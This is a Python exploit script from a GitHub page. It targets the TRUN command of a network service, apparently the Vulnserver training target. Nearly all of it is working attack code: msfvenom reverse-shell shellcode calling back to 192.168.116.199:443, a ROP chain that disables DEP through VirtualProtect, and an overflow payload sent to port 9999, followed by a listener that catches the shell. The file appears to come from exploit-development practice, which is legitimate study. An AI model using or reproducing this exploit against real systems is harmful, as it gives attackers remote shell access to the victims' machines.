-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathtrun-dep-virtualprotect-rop-exploit.py
79 lines (73 loc) · 3.48 KB
/
trun-dep-virtualprotect-rop-exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
from pwn import *
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.199 LPORT=443 -b '\x00' -f python
#x86/shikata_ga_nai succeeded with size 351 (iteration=0)
#x86/shikata_ga_nai chosen with final size 351
#Payload size: 351 bytes
buf = b""
buf += b"\x90" * 15
buf += b"\xbb\xe1\x09\xdd\x95\xd9\xc3\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12\x83\x23\x0d\x3f"
buf += b"\x60\x5f\xe6\x3d\x8b\x9f\xf7\x21\x05\x7a\xc6\x61\x71"
buf += b"\x0f\x79\x52\xf1\x5d\x76\x19\x57\x75\x0d\x6f\x70\x7a"
buf += b"\xa6\xda\xa6\xb5\x37\x76\x9a\xd4\xbb\x85\xcf\x36\x85"
buf += b"\x45\x02\x37\xc2\xb8\xef\x65\x9b\xb7\x42\x99\xa8\x82"
buf += b"\x5e\x12\xe2\x03\xe7\xc7\xb3\x22\xc6\x56\xcf\x7c\xc8"
buf += b"\x59\x1c\xf5\x41\x41\x41\x30\x1b\xfa\xb1\xce\x9a\x2a"
buf += b"\x88\x2f\x30\x13\x24\xc2\x48\x54\x83\x3d\x3f\xac\xf7"
buf += b"\xc0\x38\x6b\x85\x1e\xcc\x6f\x2d\xd4\x76\x4b\xcf\x39"
buf += b"\xe0\x18\xc3\xf6\x66\x46\xc0\x09\xaa\xfd\xfc\x82\x4d"
buf += b"\xd1\x74\xd0\x69\xf5\xdd\x82\x10\xac\xbb\x65\x2c\xae"
buf += b"\x63\xd9\x88\xa5\x8e\x0e\xa1\xe4\xc6\xe3\x88\x16\x17"
buf += b"\x6c\x9a\x65\x25\x33\x30\xe1\x05\xbc\x9e\xf6\x6a\x97"
buf += b"\x67\x68\x95\x18\x98\xa1\x52\x4c\xc8\xd9\x73\xed\x83"
buf += b"\x19\x7b\x38\x03\x49\xd3\x93\xe4\x39\x93\x43\x8d\x53"
buf += b"\x1c\xbb\xad\x5c\xf6\xd4\x44\xa7\x91\x1a\x30\xd3\xa6"
buf += b"\xf3\x43\x1b\x28\xbf\xcd\xfd\x40\xaf\x9b\x56\xfd\x56"
buf += b"\x86\x2c\x9c\x97\x1c\x49\x9e\x1c\x93\xae\x51\xd5\xde"
buf += b"\xbc\x06\x15\x95\x9e\x81\x2a\x03\xb6\x4e\xb8\xc8\x46"
buf += b"\x18\xa1\x46\x11\x4d\x17\x9f\xf7\x63\x0e\x09\xe5\x79"
buf += b"\xd6\x72\xad\xa5\x2b\x7c\x2c\x2b\x17\x5a\x3e\xf5\x98"
buf += b"\xe6\x6a\xa9\xce\xb0\xc4\x0f\xb9\x72\xbe\xd9\x16\xdd"
buf += b"\x56\x9f\x54\xde\x20\xa0\xb0\xa8\xcc\x11\x6d\xed\xf3"
buf += b"\x9e\xf9\xf9\x8c\xc2\x99\x06\x47\x47\xa9\x4c\xc5\xee"
buf += b"\x22\x09\x9c\xb2\x2e\xaa\x4b\xf0\x56\x29\x79\x89\xac"
buf += b"\x31\x08\x8c\xe9\xf5\xe1\xfc\x62\x90\x05\x52\x82\xb1"
#Disable DEP using VirtualProtect()
virtualprotect = (
p32(0x7c90e862) + # XOR EAX,EAX # RETN ** [ntdll.dll] ** | {PAGE_EXECUTE_READ}
(
p32(0x7c97225e) + # ADD EAX,100 # POP EBP # RETN ** [ntdll.dll] ** | {PAGE_EXECUTE_READ}
p32(0x41414141) # JUNK - pop ebp
) * 5 +
p32(0x7c905980) + # INC EBX # RETN 0x00 ** [ntdll.dll] ** | {PAGE_EXECUTE_READ}
p32(0x7c9059c8) + # XCHG EAX,EBX # RETN ** [ntdll.dll] ** | {PAGE_EXECUTE_READ}
p32(0x77c35370) + # POP EBP # RETN [msvcrt.dll]
p32(0x77c35370) + # skip 4 bytes [msvcrt.dll]
p32(0x77c4debf) + # POP EAX # RETN [msvcrt.dll]
p32(0x2cfe04a7) + # put delta into eax (-> put 0x00000040 into edx)
p32(0x77c4eb80) + # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
p32(0x77c58fbc) + # XCHG EAX,EDX # RETN [msvcrt.dll]
p32(0x77c57b2e) + # POP ECX # RETN [msvcrt.dll]
p32(0x77c5ebcf) + # &Writable location [msvcrt.dll]
p32(0x77c47b17) + # POP EDI # RETN [msvcrt.dll]
p32(0x77c47a42) + # RETN (ROP NOP) [msvcrt.dll]
p32(0x77c39dd4) + # POP ESI # RETN [msvcrt.dll]
p32(0x77c2aacc) + # JMP [EAX] [msvcrt.dll]
p32(0x77c4debf) + # POP EAX # RETN [msvcrt.dll]
p32(0x77c11120) + # ptr to &VirtualProtect() [IAT msvcrt.dll]
p32(0x77c12df9) + # PUSHAD # RETN [msvcrt.dll]
p32(0x77c354b4) # ptr to 'push esp # ret ' [msvcrt.dll]
)
poc = "TRUN /.:/"
poc += "A" * ((2003 + 9)-len(poc))
poc += virtualprotect
poc += buf
poc += "C" * ((5000 + 9)-len(poc))
l = listen(443)
r = remote("192.168.116.178", 9999)
print str(r.recvline())
r.send(poc)
r.close()
l.recvline()
l.interactive()
l.close()